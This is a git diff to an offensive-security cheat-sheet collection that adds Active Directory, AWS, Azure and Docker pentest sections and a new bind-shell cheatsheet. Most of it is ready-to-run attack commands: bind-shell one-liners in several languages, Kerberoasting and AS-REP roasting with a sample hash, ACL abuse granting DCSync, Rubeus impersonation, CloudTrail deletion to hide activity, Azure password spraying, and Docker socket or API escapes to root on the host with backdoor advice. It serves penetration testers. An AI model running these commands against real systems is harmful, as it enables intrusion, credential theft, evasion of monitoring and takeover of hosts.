AAAAAAA...' -Force +``` + ### Dumping AD Domain Credentials @@ -667,6 +715,11 @@ root@kali:ticket_converter$ python ticket_converter.py velociraptor.kirbi veloci Converting kirbi => ccache ``` + +Mitigations: +* Hard to detect because they are legit TGT tickets +* Mimikatz generate a golden ticket with a life-span of 10 years + ### Pass-the-Ticket Silver Tickets Forging a TGS require machine accound password (key) or NTLM hash from the KDC @@ -686,6 +739,9 @@ root@kali:/tmp$ export KRB5CCNAME=/home/user/ticket.ccache root@kali:/tmp$ ./psexec.py -k -no-pass -dc-ip 192.168.1.1 AD/administrator@192.168.1.100 ``` +Mitigations: +* Set the attribute "Account is Sensitive and Cannot be Delegated" to prevent lateral movement with the generated ticket. + ### Kerberoasting > "A service principal name (SPN) is a unique identifier of a service instance. SPNs are used by Kerberos authentication to associate a service instance with a service logon account. " - [MSDN](https://docs.microsoft.com/fr-fr/windows/desktop/AD/service-principal-names) @@ -719,12 +775,12 @@ Alternatively on macOS machine you can use [bifrost](https://github.com/its-a-fe Then crack the ticket with hashcat or john ```powershell -hashcat -m 13100 -a 0 hash.txt crackstation.txt -./john ~/hash.txt --wordlist=rockyou.lst +./hashcat -m 13100 -a 0 kerberos_hashes.txt crackstation.txt +./john --wordlist=/opt/wordlists/rockyou.txt --fork=4 --format=krb5tgs ~/kerberos_hashes.txt ``` Mitigations: -* Have a very long password for your accounts with SPNs (> 25 characters) +* Have a very long password for your accounts with SPNs (> 32 characters) * Make sure no users have SPNs ### KRB_AS_REP Roasting @@ -771,6 +827,13 @@ C:\Rubeus> john --wordlist=passwords_kerb.txt hashes.asreproast Using `impacket` to get the hash and `hashcat` to crack it. ```powershell +# example +$ python GetNPUsers.py htb.local/svc-alfresco -no-pass +Impacket v0.9.21-dev - Copyright 2019 SecureAuth Corporation + +[*] Getting TGT for svc-alfresco +$krb5asrep$23$svc-alfresco@HTB.LOCAL:c13528009a59be0a634bb9b8e84c88ee$cb8e87d02bd0ac7ae561334cd58a56af90f7fbb20bbd4493b6754a57d5ebc08cb7f47ea472ebb7c9ba4260f57c11b664be03191550254e5c77a17518aeabc55f9321bd9f52201df820e130aa0e3f4b0986725fd3a14794433881050eb62d384c4058a407a348a7de2ef0767a99c9df4f85d8eba8ce30a4ad59621c51f8ea8c0d33f33e06bea1d8ff28d7a86fc2010fd7fa45d2fcc2178cb13c1006823aec8a5da10cffcceeb6e978754b0d4976df5cccb4beb9776d5a8f4810153ccc0e1237ec74e6ae61402457c6cfe29bca7c2f62b287f13aff063f5a0a21c728581e43b46d7537b3e776b4 + # extract hashes root@kali:impacket-examples$ python GetNPUsers.py jurassic.park/ -usersfile usernames.txt -format hashcat -outputfile hashes.asreproast root@kali:impacket-examples$ python GetNPUsers.py jurassic.park/triceratops:Sh4rpH0rns -request -format hashcat -outputfile hashes.asreproast @@ -779,6 +842,9 @@ root@kali:impacket-examples$ python GetNPUsers.py jurassic.park/triceratops:Sh4r root@kali:impacket-examples$ hashcat -m 18200 --force -a 0 hashes.asreproast passwords_kerb.txt ``` +Mitigations: +* All accounts must have "Kerberos Pre-Authentication" enabled (Enabled by Default). + ### Pass-the-Hash The types of hashes you can use with Pass-The-Hash are NT or NTLM hashes. Since Windows Vista, attackers have been unable to pass-the-hash to local admin accounts that weren’t the built-in RID 500. @@ -1019,24 +1085,59 @@ Add-ObjectAcl -TargetADSprefix 'CN=AdminSDHolder,CN=System' -PrincipalSamAccount ### Abusing Active Directory ACLs/ACEs -* **GenericAll on User** : We can reset user's password without knowing the current password -* **GenericAll on Group** : Effectively, this allows us to add ourselves (the user spotless) to the Domain Admin group : `net group "domain admins" spotless /add /domain` -* **WriteProperty on Group** : We can again add ourselves to the Domain Admins group and escalate privileges: `net user spotless /domain; Add-NetGroupUser -UserName spotless -GroupName "domain admins" -Domain "offense.local"; net user spotless /domain` -* **Self (Self-Membership) on Group** : Another privilege that enables the attacker adding themselves to a group -* **ForceChangePassword** : we can reset the user's password without knowing their current password: `$c = Get-Credential;Set-DomainUserPassword -Identity changeme -AccountPassword $c.Password -Verbose` -* **GenericWrite on User** : WriteProperty on an ObjectType, which in this particular case is Script-Path, allows the attacker to overwrite the logon script path of the delegate user, which means that the next time, when the user delegate logs on, their system will execute our malicious script : `Set-ADObject -SamAccountName delegate -PropertyName scriptpath -PropertyValue "\\10.0.0.5\totallyLegitScript.ps1` -* **WriteDACL** : It is possible to add any given account as a replication partner of the domain by applying the following extended rights Replicating Directory Changes/Replicating Directory Changes All. [Invoke-ACLPwn](https://github.com/fox-it/Invoke-ACLPwn) is a tool that automates the discovery and pwnage of ACLs in Active Directory that are unsafe configured : `./Invoke-ACL.ps1 -SharpHoundLocation .\sharphound.exe -mimiKatzLocation .\mimikatz.exe -Username 'testuser' -Domain 'xenoflux.local' -Password 'Welcome01!'` - ```powershell - # give DCSync right to titi - Add-ObjectACL -TargetDistinguishedName "dc=dev,dc=testlab,dc=local" -PrincipalSamAccountName titi -Rights DCSync - ``` - Check ACL for an User with [ADACLScanner](https://github.com/canix1/ADACLScanner). ```powershell ADACLScan.ps1 -Base "DC=contoso;DC=com" -Filter "(&(AdminCount=1))" -Scope subtree -EffectiveRightsPrincipal User1 -Output HTML -Show ``` +#### GenericAll + +* **GenericAll on User** : We can reset user's password without knowing the current password +* **GenericAll on Group** : Effectively, this allows us to add ourselves (the user spotless) to the Domain Admin group : `net group "domain admins" spotless /add /domain` + +GenericAll/GenericWrite we can set a SPN on a target account, request a TGS, then grab its hash and kerberoast it. + +```powershell +# using PowerView +# Check for interesting permissions on accounts: +Invoke-ACLScanner -ResolveGUIDs | ?{$_.IdentinyReferenceName -match "RDPUsers"} + +# Check if current user has already an SPN setted: +Get-DomainUser -Identity | select serviceprincipalname + +# Force set the SPN on the account: +Set-DomainObject -Set @{serviceprincipalname='ops/whatever1'} +``` + +#### GenericWrite + +* Reset another user's password + + ```powershell + # https://github.com/EmpireProject/Empire/blob/master/data/module_source/situational_awareness/network/powerview.ps1 + $user = 'DOMAIN\user1'; + $pass= ConvertTo-SecureString 'user1pwd' -AsPlainText -Force; + $creds = New-Object System.Management.Automation.PSCredential $user, $pass; + $newpass = ConvertTo-SecureString 'newsecretpass' -AsPlainText -Force; + Set-DomainUserPassword -Identity 'DOMAIN\user2' -AccountPassword $newpass -Credential $creds; + ``` + +* WriteProperty on an ObjectType, which in this particular case is Script-Path, allows the attacker to overwrite the logon script path of the delegate user, which means that the next time, when the user delegate logs on, their system will execute our malicious script : `Set-ADObject -SamAccountName delegate -PropertyName scriptpath -PropertyValue "\\10.0.0.5\totallyLegitScript.ps1` + + +#### WriteDACL + +To abuse WriteDacl to a domain object, you may grant yourself the DcSync privileges. It is possible to add any given account as a replication partner of the domain by applying the following extended rights Replicating Directory Changes/Replicating Directory Changes All. [Invoke-ACLPwn](https://github.com/fox-it/Invoke-ACLPwn) is a tool that automates the discovery and pwnage of ACLs in Active Directory that are unsafe configured : `./Invoke-ACL.ps1 -SharpHoundLocation .\sharphound.exe -mimiKatzLocation .\mimikatz.exe -Username 'user1' -Domain 'domain.local' -Password 'Welcome01!'` + +```powershell +# Give DCSync right to the principal identity +Import-Module .\PowerView.ps1 +$SecPassword = ConvertTo-SecureString 'user1pwd' -AsPlainText -Force +$Cred = New-Object System.Management.Automation.PSCredential('DOMAIN.LOCAL\user1', $SecPassword) +Add-DomainObjectAcl -Credential $Cred -TargetIdentity 'DC=domain,DC=local' -Rights DCSync -PrincipalIdentity user2 -Verbose -Domain domain.local +``` + ### Trust relationship between domains @@ -1193,7 +1294,9 @@ Impacket v0.9.21-dev - Copyright 2019 SecureAuth Corporation [*] Saving ticket in Administrator.ccache # Exploit with Rubeus -$ rubeus s4u /user:user_for_delegation /rc4:user_pwd_hash /impersonateuser:user_to_impersonate /domain:domain.com /dc:dc01.domain.com /msdsspn:cifs/srv01.domain.com /ptt +$ ./Rubeus.exe s4u /user:user_for_delegation /rc4:user_pwd_hash /impersonateuser:user_to_impersonate /domain:domain.com /dc:dc01.domain.com /msdsspn:cifs/srv01.domain.com /ptt +$ ./Rubeus.exe s4u /user:MACHINE$ /rc4:MACHINE_PWD_HASH /impersonateuser:Administrator /msdsspn:"cifs/dc.domain.com" /ptt +$ dir \\dc.domain.com\c$ ``` @@ -1503,6 +1606,7 @@ CME 10.XXX.XXX.XXX:445 HOSTNAME-01 [+] DOMAIN\COMPUTER$ 6b3723410a3c5 ## References +* [Explain like I’m 5: Kerberos - Apr 2, 2013 - @roguelynn](https://www.roguelynn.com/words/explain-like-im-5-kerberos/) * [Impersonating Office 365 Users With Mimikatz - January 15, 2017 - Michael Grafnetter](#https://www.dsinternals.com/en/impersonating-office-365-users-mimikatz/) * [Abusing Exchange: One API call away from Domain Admin - Dirk-jan Mollema](https://dirkjanm.io/abusing-exchange-one-api-call-away-from-domain-admin) * [Abusing Kerberos: Kerberoasting - Haboob Team](https://www.exploit-db.com/docs/english/45051-abusing-kerberos---kerberoasting.pdf) @@ -1563,4 +1667,10 @@ CME 10.XXX.XXX.XXX:445 HOSTNAME-01 [+] DOMAIN\COMPUTER$ 6b3723410a3c5 * [SMB Share – SCF File Attacks - December 13, 2017 - @netbiosX](pentestlab.blog/2017/12/13/smb-share-scf-file-attacks/) * [Escalating privileges with ACLs in Active Directory - April 26, 2018 - Rindert Kramer and Dirk-jan Mollema](https://blog.fox-it.com/2018/04/26/escalating-privileges-with-acls-in-active-directory/) * [A Red Teamer’s Guide to GPOs and OUs - APRIL 2, 2018 - @_wald0](https://wald0.com/?p=179) -* [Carlos Garcia - Rooted2019 - Pentesting Active Directory Forests public.pdf](https://www.dropbox.com/s/ilzjtlo0vbyu1u0/Carlos%20Garcia%20-%20Rooted2019%20-%20Pentesting%20Active%20Directory%20Forests%20public.pdf?dl=0) \ No newline at end of file +* [Carlos Garcia - Rooted2019 - Pentesting Active Directory Forests public.pdf](https://www.dropbox.com/s/ilzjtlo0vbyu1u0/Carlos%20Garcia%20-%20Rooted2019%20-%20Pentesting%20Active%20Directory%20Forests%20public.pdf?dl=0) +* [Kerberosity Killed the Domain: An Offensive Kerberos Overview - Ryan Hausknecht - Mar 10](https://posts.specterops.io/kerberosity-killed-the-domain-an-offensive-kerberos-overview-eb04b1402c61) +* [Active-Directory-Exploitation-Cheat-Sheet - @buftas](https://github.com/buftas/Active-Directory-Exploitation-Cheat-Sheet#local-privilege-escalation) +* [GPO Abuse - Part 1 - RastaMouse - 6 January 2019](https://rastamouse.me/2019/01/gpo-abuse-part-1/) +* [GPO Abuse - Part 2 - RastaMouse - 13 January 2019](https://rastamouse.me/2019/01/gpo-abuse-part-2/) +* [Abusing GPO Permissions - harmj0y - March 17, 2016](https://www.harmj0y.net/blog/redteaming/abusing-gpo-permissions/) +* [How To Attack Kerberos 101 - m0chan - July 31, 2019](https://m0chan.github.io/2019/07/31/How-To-Attack-Kerberos-101.html) \ No newline at end of file diff --git a/Methodology and Resources/Bind Shell Cheatsheet.md b/Methodology and Resources/Bind Shell Cheatsheet.md new file mode 100644 index 0000000..73df69d --- /dev/null +++ b/Methodology and Resources/Bind Shell Cheatsheet.md @@ -0,0 +1,71 @@ +# Bind Shell + +## Summary + +* [Reverse Shell](#reverse-shell) + * [Perl](#perl) + * [Python](#python) + * [PHP](#php) + * [Ruby](#ruby) + * [Netcat Traditional](#netcat-traditional) + * [Netcat OpenBsd](#netcat-openbsd) + * [Ncat](#ncat) + * [Socat](#socat) + * [Powershell](#powershell) + + +## Perl + +```perl +perl -e 'use Socket;$p=51337;socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));\ +bind(S,sockaddr_in($p, INADDR_ANY));listen(S,SOMAXCONN);for(;$p=accept(C,S);\ +close C){open(STDIN,">&C");open(STDOUT,">&C");open(STDERR,">&C");exec("/bin/bash -i");};' +``` + +## PHP + +```php +php -r '$s=socket_create(AF_INET,SOCK_STREAM,SOL_TCP);socket_bind($s,"0.0.0.0",51337);\ +socket_listen($s,1);$cl=socket_accept($s);while(1){if(!socket_write($cl,"$ ",2))exit;\ +$in=socket_read($cl,100);$cmd=popen("$in","r");while(!feof($cmd)){$m=fgetc($cmd);\ + socket_write($cl,$m,strlen($m));}}' +``` + +## Ruby + +```ruby +ruby -rsocket -e 'f=TCPServer.new(51337);s=f.accept;exec sprintf("/bin/sh -i <&%d >&%d 2>&%d",s,s,s)' +``` + +## Netcat Traditional + +```powershell +nc -nlvp 51337 -e /bin/bash +``` + +## Netcat OpenBsd + +```powershell +rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/bash -i 2>&1|nc -lvp 51337 >/tmp/f +``` + +## Socat + +```powershell +user@attacker$ socat FILE:`tty`,raw,echo=0 TCP:target.com:12345 +user@victim$ socat TCP-LISTEN:12345,reuseaddr,fork EXEC:/bin/sh,pty,stderr,setsid,sigint,sane +``` + +## Powershell + +```powershell +https://github.com/besimorhino/powercat + +# Victim (listen) +. .\powercat.ps1 +powercat -l -p 7002 -ep + +# Connect from attacker +. .\powercat.ps1 +powercat -c 127.0.0.1 -p 7002 +``` \ No newline at end of file diff --git a/Methodology and Resources/Cloud - AWS Pentest.md b/Methodology and Resources/Cloud - AWS Pentest.md index bfe25c0..2342c2b 100644 --- a/Methodology and Resources/Cloud - AWS Pentest.md +++ b/Methodology and Resources/Cloud - AWS Pentest.md @@ -12,6 +12,7 @@ * [Method for Container Service (Fargate)](#method-for-container-service-fargate) * [AWS - Shadow Admin](#aws---shadow-admin) * [Admin equivalent permission](#admin-equivalent-permission) +* [AWS - Gaining AWS Console Access via API Keys](#aws---gaining-aws-console-access-via-api-keys) * [AWS - Mount EBS volume to EC2 Linux](#aws---mount-ebs-volume-to-ec2-linux) * [AWS - Copy EC2 using AMI Image](#aws---copy-ec2-using-ami-image) * [AWS - Instance Connect - Push an SSH key to EC2 instance](#aws---instance-connect---push-an-ssh-key-to-ec2-instance) @@ -331,6 +332,23 @@ Example : https://awesomeapp.com/forward?target=http://169.254.169.254/latest/me $ aws glue create-dev-endpoint –endpoint-name my_dev_endpoint –role-arn arn_of_glue_service_role –public-key file://path/to/my/public/ssh/key.pub ``` +## AWS - Gaining AWS Console Access via API Keys + +A utility to convert your AWS CLI credentials into AWS console access. + +```powershell +$> git clone https://github.com/NetSPI/aws_consoler +$> aws_consoler -v -a AKIA[REDACTED] -s [REDACTED] +2020-03-13 19:44:57,800 [aws_consoler.cli] INFO: Validating arguments... +2020-03-13 19:44:57,801 [aws_consoler.cli] INFO: Calling logic. +2020-03-13 19:44:57,820 [aws_consoler.logic] INFO: Boto3 session established. +2020-03-13 19:44:58,193 [aws_consoler.logic] WARNING: Creds still permanent, creating federated session. +2020-03-13 19:44:58,698 [aws_consoler.logic] INFO: New federated session established. +2020-03-13 19:44:59,153 [aws_consoler.logic] INFO: Session valid, attempting to federate as arn:aws:sts::123456789012:federated-user/aws_consoler. +2020-03-13 19:44:59,668 [aws_consoler.logic] INFO: URL generated! +https://signin.aws.amazon.com/federation?Action=login&Issuer=consoler.local&Destination=https%3A%2F%2Fconsole.aws.amazon.com%2Fconsole%2Fhome%3Fregion%3Dus-east-1&SigninToken=[REDACTED +``` + ## AWS - Mount EBS volume to EC2 Linux :warning: EBS snapshots are block-level incremental, which means that every snapshot only copies the blocks (or areas) in the volume that had been changed since the last snapshot. To restore your data, you need to create a new EBS volume from one of your EBS snapshots. The new volume will be a duplicate of the initial EBS volume on which the snapshot was taken. @@ -456,6 +474,25 @@ Prerequisite: 14. locally run `"secretsdump.py -system ./SYSTEM -ntds ./ntds.dit local -outputfile secrets'`, expects secretsdump to be on path +## Disable CloudTrail + +```powershell +$ aws cloudtrail delete-trail --name cloudgoat_trail --profile administrator +``` + +Disable monitoring of events from global services + +```powershell +$ aws cloudtrail update-trail --name cloudgoat_trail --no-include-global-service-event +``` + +Disable Cloud Trail on specific regions + +```powershell +$ aws cloudtrail update-trail --name cloudgoat_trail --no-include-global-service-event --no-is-multi-region --region=eu-west +``` + + ## Cover tracks by obfuscating Cloudtrail logs and Guard Duty :warning: When using awscli on Kali Linux, Pentoo and Parrot Linux, a log is generated based on the user-agent. @@ -570,4 +607,5 @@ https://github.com/DenizParlak/Zeus * [HOW I HACKED A WHOLE EC2 NETWORK DURING A PENETRATION TEST - by Federico Fernandez](https://www.secsignal.org/en/news/how-i-hacked-a-whole-ec2-network-during-a-penetration-test/) * [How to Attach and Mount an EBS volume to EC2 Linux Instance - AUGUST 17, 2016](https://devopscube.com/mount-ebs-volume-ec2-instance/) * [Getting shell and data access in AWS by chaining vulnerabilities - Riyaz Walikar - Aug 29, 2019 ](https://blog.appsecco.com/getting-shell-and-data-access-in-aws-by-chaining-vulnerabilities-7630fa57c7ed) -* [Getting started with Version 2 of AWS EC2 Instance Metadata service (IMDSv2) - Sunesh Govindaraj - Nov 25, 2019](https://blog.appsecco.com/getting-started-with-version-2-of-aws-ec2-instance-metadata-service-imdsv2-2ad03a1f3650) \ No newline at end of file +* [Getting started with Version 2 of AWS EC2 Instance Metadata service (IMDSv2) - Sunesh Govindaraj - Nov 25, 2019](https://blog.appsecco.com/getting-started-with-version-2-of-aws-ec2-instance-metadata-service-imdsv2-2ad03a1f3650) +* [Gaining AWS Console Access via API Keys - Ian Williams - March 18th, 2020](https://blog.netspi.com/gaining-aws-console-access-via-api-keys/) \ No newline at end of file diff --git a/Methodology and Resources/Cloud - Azure Pentest.md b/Methodology and Resources/Cloud - Azure Pentest.md index 3cbe340..056261a 100644 --- a/Methodology and Resources/Cloud - Azure Pentest.md +++ b/Methodology and Resources/Cloud - Azure Pentest.md @@ -7,6 +7,8 @@ * [Azure Storage Account - Access](#azure-storage-account----access) * [Azure AD vs Active Directory](#azure-ad-vs-active-directory) * [Azure AD - Enumeration](#azure-ad---enumeration) +* [Azure AD - Password Spray](#azure-ad---password-spray) +* [Azure AD - Convert GUID to SID](#azure-ad---convert-guid-to-sid) * [Azure AD - Sign in with a service principal](#azure-ad---sign-in-with-a-service-principal) * [Azure AD Connect - Password extraction](#azure-ad-connect---password-extraction) * [Azure AD Connect - MSOL Account's password and DCSync](#azure-ad-connect---msol-accounts-password-and-dcsync) @@ -28,8 +30,9 @@ $ git clone https://github.com/hausec/PowerZure $ ipmo .\PowerZure $ Set-Subscription -Id [idgoeshere] + # Reader - $ Get-Runbook + $ Get-Runbook, Get-AllUsers, Get-Apps, Get-Resources, Get-WebApps, Get-WebAppDetails # Contributor $ Execute-Command -OS Windows -VM Win10Test -ResourceGroup Test-RG -Command "whoami" @@ -172,6 +175,21 @@ Found Container - hrsecure.blob.core.windows.net/NETSPItest ## Azure AD - Enumeration +> By default it is possible to query almost all the information about the directory as authenticated user, even when the Azure portal is restricted, using Azure AD Graph. + +Check if the compagny is using Azure AD with `https://login.microsoftonline.com/getuserrealm.srf?login=username@target.onmicrosoft.com&xml=1`. + +```powershell +$ git clone https://github.com/dirkjanm/ROADtools +$ pip install roadrecon +$ roadrecon auth [-h] [-u USERNAME] [-p PASSWORD] [-t TENANT] [-c CLIENT] [--as-app] [--device-code] [--access-token ACCESS_TOKEN] [--refresh-token REFRESH_TOKEN] [-f TOKENFILE] [--tokens-stdout] +$ roadrecon gather [-h] [-d DATABASE] [-f TOKENFILE] [--tokens-stdin] [--mfa] +$ roadrecon dump +$ roadrecon gui +``` + +Can be used in BloodHound using the fork : https://github.com/dirkjanm/BloodHound-AzureAD + ```powershell PS C:\> git clone https://github.com/adrecon/AzureADRecon.git PS C:\> Install-Module -Name AzureAD @@ -187,6 +205,19 @@ PS C:\> .\AzureADRecon.ps1 -Credential $creds PS C:\>.\AzureADRecon.ps1 -GenExcel C:\AzureADRecon-Report- ``` +Stormspotter, graphing Azure and Azure Active Directory objects + +```powershell +$ docker run --name stormspotter -p7474:7474 -p7687:7687 -d --env NEO4J_AUTH=neo4j/[password] neo4j:3.5.18 +git clone https://github.com/Azure/Stormspotter +cd Stormspotter +pipenv install . +stormspotter --cli +stormdash -dbu -dbp +Browse to http://127.0.0.1:8050 to interact with the graph. +``` + +Other interesting commands to enumerate Azure AD. ```powershell # Azure AD powershell module @@ -251,6 +282,7 @@ ForEach($role in $roles) { $roleUsers ### Enumeration using Microburst +git clone https://github.com/NetSPI/MicroBurst/blob/master/Get-AzureADDomainInfo.ps1 Import-Module .\MicroBurst.psm1 # Anonymous enumeration @@ -258,6 +290,7 @@ Invoke-EnumerateAzureBlobs -Base company Invoke-EnumerateAzureSubDomains -base company -verbose # Authencticated enumeration +Get-AzureADDomainInfo Get-AzureDomainInfo -folder MicroBurst -VerboseGet-MSOLDomainInfo Get-MSOLDomainInfo ``` @@ -270,6 +303,34 @@ With Microsoft, if you are using any cloud services (Office 365, Exchange Online 3. Pick the account from the active sessions 4. Select Azure Active Directory and enjoy! +## Azure AD - Password Spray + +> Default lockout policy of 10 failed attempts, locking out an account for 60 seconds + +```powershell +git clone https://github.com/dafthack/MSOLSpray +Import-Module .\MSOLSpray.ps1 +Invoke-MSOLSpray -UserList .\userlist.txt -Password Winter2020 +Invoke-MSOLSpray -UserList .\users.txt -Password d0ntSprayme! + +# UserList - UserList file filled with usernames one-per-line in the format "user@domain.com" +# Password - A single password that will be used to perform the password spray. +# OutFile - A file to output valid results to. +# Force - Forces the spray to continue and not stop when multiple account lockouts are detected. +# URL - The URL to spray against. Potentially useful if pointing at an API Gateway URL generated with something like FireProx to randomize the IP address you are authenticating from. +``` + +## Azure AD - Convert GUID to SID + +The user's AAD id is translated to SID by concatenating `"S-1–12–1-"` to the decimal representation of each section of the AAD Id. + +```powershell +GUID: [base16(a1)]-[base16(a2)]-[ base16(a3)]-[base16(a4)] +SID: S-1–12–1-[base10(a1)]-[ base10(a2)]-[ base10(a3)]-[ base10(a4)] +``` + +For example, the representation of `6aa89ecb-1f8f-4d92–810d-b0dce30b6c82` is `S-1–12–1–1789435595–1301421967–3702525313–2188119011` + ## Azure AD - Sign in with a service principal https://docs.microsoft.com/en-us/powershell/azure/authenticate-azureps?view=azps-3.3.0&viewFallbackFrom=azurermps-6.5.0#sign-in-with-a-service-principal @@ -313,7 +374,11 @@ Prerequisite: * Compromise a server with Azure AD Connect service * Access to ADSyncAdmins or local Administrators groups -Use the script **azuread_decrypt_msol.ps1** from @xpn : https://gist.github.com/xpn/0dc393e944d8733e3c63023968583545#file-azuread_decrypt_msol-ps1 to recover the decrypted password for the MSOL account +Use the script **azuread_decrypt_msol.ps1** from @xpn to recover the decrypted password for the MSOL account: +* `azuread_decrypt_msol.ps1`: AD Connect Sync Credential Extract POC https://gist.github.com/xpn/0dc393e944d8733e3c63023968583545 +* `azuread_decrypt_msol_v2.ps1`: Updated method of dumping the MSOL service account (which allows a DCSync) used by Azure AD Connect Sync https://gist.github.com/xpn/f12b145dba16c2eebdd1c6829267b90c + +Now you can use the retrieved credentials for the MSOL Account to launch a DCSync attack. ## Azure AD Connect - Seamless Single Sign On Silver Ticket @@ -411,13 +476,14 @@ NOTE: By default, O365 has a lockout policy of 10 tries, and it will lock out an https://fws.domain.com/o365/visfed/intrdomain/se/?username=firstname.lastname%40domain.com&wa=wsignin1.0&wtrealm=urn%3afederation%3aMicrosoftOnline&wctx= ``` +* Validate email : https://github.com/LMGsec/o365creeper `o365creeper.py -f emails.txt -o validemails.txt` * Extract email lists with a valid credentials : https://github.com/nyxgeek/o365recon ## References * [An introduction to penetration testing Azure - Graceful Security](https://www.gracefulsecurity.com/an-introduction-to-penetration-testing-azure/) -* [Running POwershell scripts on Azure VM - Netspi](https://blog.netspi.com/running-powershell-scripts-on-azure-vms/) +* [Running Powershell scripts on Azure VM - Netspi](https://blog.netspi.com/running-powershell-scripts-on-azure-vms/) * [Attacking Azure Cloud shell - Netspi](https://blog.netspi.com/attacking-azure-cloud-shell/) * [Maintaining Azure Persistence via automation accounts - Netspi](https://blog.netspi.com/maintaining-azure-persistence-via-automation-accounts/) * [Detecting an attacks on active directory with Azure - Smartspate](https://www.smartspate.com/detecting-an-attacks-on-active-directory-with-azure/) @@ -426,4 +492,9 @@ NOTE: By default, O365 has a lockout policy of 10 tries, and it will lock out an * [Building Free Active Directory Lab in Azure - @kamran.bilgrami](https://medium.com/@kamran.bilgrami/ethical-hacking-lessons-building-free-active-directory-lab-in-azure-6c67a7eddd7f) * [Attacking Azure/Azure AD and introducing Powerzure - SpecterOps](https://posts.specterops.io/attacking-azure-azure-ad-and-introducing-powerzure-ca70b330511a) * [Azure AD connect for RedTeam - @xpnsec](https://blog.xpnsec.com/azuread-connect-for-redteam/) -* [Azure Privilege Escalation Using Managed Identities - Karl Fosaaen - February 20th, 2020](https://blog.netspi.com/azure-privilege-escalation-using-managed-identities/) \ No newline at end of file +* [Azure Privilege Escalation Using Managed Identities - Karl Fosaaen - February 20th, 2020](https://blog.netspi.com/azure-privilege-escalation-using-managed-identities/) +* [Hunting Azure Admins for Vertical Escalation - LEE KAGAN - MARCH 13, 2020](https://www.lares.com/hunting-azure-admins-for-vertical-escalation/) +* [Introducing ROADtools - The Azure AD exploration framework - Dirk-jan Mollema](https://dirkjanm.io/introducing-roadtools-and-roadrecon-azure-ad-exploration-framework/) +* [Moving laterally between Azure AD joined machines - Tal Maor - Mar 17, 2020](https://medium.com/@talthemaor/moving-laterally-between-azure-ad-joined-machines-ed1f8871da56) +* [AZURE AD INTRODUCTION FOR RED TEAMERS - Written by Aymeric Palhière (bak) - 2020-04-20](https://www.synacktiv.com/posts/pentest/azure-ad-introduction-for-red-teamers.html) +* [Impersonating Office 365 Users With Mimikatz - January 15, 2017 - Michael Grafnetter](https://www.dsinternals.com/en/impersonating-office-365-users-mimikatz/) \ No newline at end of file diff --git a/Methodology and Resources/Container - Docker Pentest.md b/Methodology and Resources/Container - Docker Pentest.md new file mode 100644 index 0000000..b8faaa3 --- /dev/null +++ b/Methodology and Resources/Container - Docker Pentest.md @@ -0,0 +1,186 @@ +# Docker Pentest + +> Docker is a set of platform as a service (PaaS) products that uses OS-level virtualization to deliver software in packages called containers. + +## Summary + +- [Tools](#tools) +- [Mounted Docker Socket](#mounted-docker-socket) +- [Open Docker API Port](#open-docker-api-port) +- [Insecure Docker Registry](#insecure-docker-registry) +- [Exploit privileged container abusing the Linux cgroup v1](#exploit-privileged-container-abusing-the-linux-cgroup-v1) +- [Breaking out of Docker via runC](#breaking-out-of-docker-via-runc) +- [Breaking out of containers using a device file](#breaking-out-of-containers-using-a-device-file) +- [References](#references) + +## Tools + +* Dockscan : https://github.com/kost/dockscan + ```powershell + dockscan unix:///var/run/docker.sock + dockscan -r html -o myreport -v tcp://example.com:5422 + ``` + +## Mounted Docker Socket + +Prerequisite: +* Socker mounted as volume : `- "/var/run/docker.sock:/var/run/docker.sock"` + +Usually found in `/var/run/docker.sock`, for example for Portainer. + +```powershell +curl --unix-socket /var/run/docker.sock http://127.0.0.1/containers/json +curl -XPOST –unix-socket /var/run/docker.sock -d '{"Image":"nginx"}' -H 'Content-Type: application/json' http://localhost/containers/create +curl -XPOST –unix-socket /var/run/docker.sock http://localhost/containers/ID_FROM_PREVIOUS_COMMAND/start +``` + +Exploit using [brompwnie/ed](https://github.com/brompwnie/ed) + +```powershell +root@37bb034797d1:/tmp# ./ed_linux_amd64 -path=/var/run/ -autopwn=true +[+] Hunt dem Socks +[+] Hunting Down UNIX Domain Sockets from: /var/run/ +[*] Valid Socket: /var/run/docker.sock +[+] Attempting to autopwn +[+] Hunting Docker Socks +[+] Attempting to Autopwn: /var/run/docker.sock +[*] Getting Docker client... +[*] Successfully got Docker client... +[+] Attempting to escape to host... +[+] Attempting in TTY Mode +chroot /host && clear +echo 'You are now on the underlying host' +chroot /host && clear +echo 'You are now on the underlying host' +/ # chroot /host && clear +/ # echo 'You are now on the underlying host' +You are now on the underlying host +/ # id +uid=0(root) gid=0(root) groups=0(root),1(bin),2(daemon),3(sys),4(adm),6(disk),10(wheel),11(floppy),20(dialout),26(tape),27(video) +``` + + +## Open Docker API Port + +Prerequisite: +* Docker runned with `-H tcp://0.0.0.0:XXXX` + +```powershell +$ nmap -sCV 10.10.10.10 -p 2376 +2376/tcp open docker Docker 19.03.5 +| docker-version: +| Version: 19.03.5 +| MinAPIVersion: 1.12 +``` + +Mount the current system inside a new "temporary" Ubuntu container, you will gain root access to the filesystem in `/mnt`. + +```powershell +$ export DOCKER_HOST=tcp://10.10.10.10:2376 +$ docker run --name ubuntu_bash --rm -i -v /:/mnt -u 0 -t ubuntu bash +or +$ docker -H open.docker.socket:2375 ps +$ docker -H open.docker.socket:2375 exec -it mysql /bin/bash +or +$ curl -s –insecure https://tls-opendocker.socket:2376/secrets | jq +$ curl –insecure -X POST -H "Content-Type: application/json" https://tls-opendocker.socket2376/containers/create?name=test -d '{"Image":"alpine", "Cmd":["/usr/bin/tail", "-f", "1234", "/dev/null"], "Binds": [ "/:/mnt" ], "Privileged": true}' +``` + +From there you can backdoor the filesystem by adding an ssh key in `/root/.ssh` or adding a new root user in `/etc/passwd`. + + +## Insecure Docker Registry + +Docker Registry’s fingerprint is `Docker-Distribution-Api-Version` header. Then connect to Registry API endpoint: `/v2/_catalog`. + +```powershell +curl https://registry.example.com/v2//tags/list +docker pull https://registry.example.com:443/: + +# connect to the endpoint and list image blobs +curl -s -k --user "admin:admin" https://docker.registry.local/v2/_catalog +curl -s -k --user "admin:admin" https://docker.registry.local/v2/wordpress-image/tags/list +curl -s -k --user "admin:admin" https://docker.registry.local/v2/wordpress-image/manifests/latest +# download blobs +curl -s -k --user 'admin:admin' 'http://docker.registry.local/v2/wordpress-image/blobs/sha256:c314c5effb61c9e9c534c81a6970590ef4697b8439ec6bb4ab277833f7315058' > out.tar.gz +# automated download +https://github.com/NotSoSecure/docker_fetch/ +python /opt/docker_fetch/docker_image_fetch.py -u 